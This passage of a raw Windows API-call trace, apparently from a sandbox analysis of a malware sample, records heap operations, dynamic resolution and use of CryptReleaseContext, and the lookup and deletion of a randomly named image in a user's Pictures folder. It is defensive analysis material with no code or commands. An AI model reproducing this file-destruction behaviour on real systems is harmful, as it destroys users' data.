dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0256.034] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.034] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0256.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0256.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0256.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0256.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0256.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0256.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0256.034] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0256.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0256.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0256.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0256.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0256.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0256.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0256.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0256.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0256.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0256.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0256.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0256.110] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0256.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0256.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0256.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0256.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0256.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0256.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0256.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0256.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0256.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0256.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0256.203] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0256.203] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0256.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0256.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0256.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0256.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0256.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0256.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0256.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0256.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0256.205] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0256.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0256.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0256.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0256.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0256.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0256.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.205] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0256.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0256.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0256.206] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.206] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0256.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0256.206] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0256.206] FreeLibrary (hLibModule=0x756e0000) returned 1 [0256.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0256.206] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0256.206] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.206] CloseHandle (hObject=0x2a0) returned 1 [0256.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.208] CloseHandle (hObject=0x2d0) returned 1 [0256.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.214] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.214] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0256.214] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/thpKc0ZlnbdGnIRJzL.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\thpKc0ZlnbdGnIRJzL.gif", lpFilePart=0x8cedf4*="thpKc0ZlnbdGnIRJzL.gif") returned 0x2f [0256.215] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\thpKc0ZlnbdGnIRJzL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\thpkc0zlnbdgnirjzl.gif")) returned 0x20 [0256.215] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\thpKc0ZlnbdGnIRJzL.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x347e7710, ftCreationTime.dwHighDateTime=0x1d5ef90, ftLastAccessTime.dwLowDateTime=0x6cb0f210, ftLastAccessTime.dwHighDateTime=0x1d5f03b, ftLastWriteTime.dwLowDateTime=0x6cb0f210, ftLastWriteTime.dwHighDateTime=0x1d5f03b, nFileSizeHigh=0x0, nFileSizeLow=0xc6f1, dwReserved0=0x1, dwReserved1=0x1c, cFileName="thpKc0ZlnbdGnIRJzL.gif", cAlternateFileName="THPKC0~1.GIF")) returned 0xa86f50 [0256.215] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\thpKc0ZlnbdGnIRJzL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\thpkc0zlnbdgnirjzl.gif")) returned 1 [0256.286] FindNextFileW (in: hFindFile=0xa86f50, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x347e7710, ftCreationTime.dwHighDateTime=0x1d5ef90, ftLastAccessTime.dwLowDateTime=0x6cb0f210, ftLastAccessTime.dwHighDateTime=0x1d5f03b, ftLastWriteTime.dwLowDateTime=0x6cb0f210, ftLastWriteTime.dwHighDateTime=0x1d5f03b, nFileSizeHigh=0x0, nFileSizeLow=0xc6f1, dwReserved0=0x1, dwReserved1=0x1c, cFileName="thpKc0ZlnbdGnIRJzL.gif", cAlternateFileName="THPKC0~1.GIF")) returned 0 [0256.286] FindClose (in: hFindFile=0xa86f50 | out: hFindFile=0xa86f50) returned 1 [0256.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0256.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0256.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0256.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.287] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0256.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0256.288] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/thpKc0ZlnbdGnIRJzL.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\thpKc0ZlnbdGnIRJzL.gif", lpFilePart=0x8cf650*="thpKc0ZlnbdGnIRJzL.gif") returned 0x2f [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0256.288] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\thpKc0ZlnbdGnIRJzL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\thpkc0zlnbdgnirjzl.gif")) returned 0xffffffff [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0256.288] HeapFree (in: 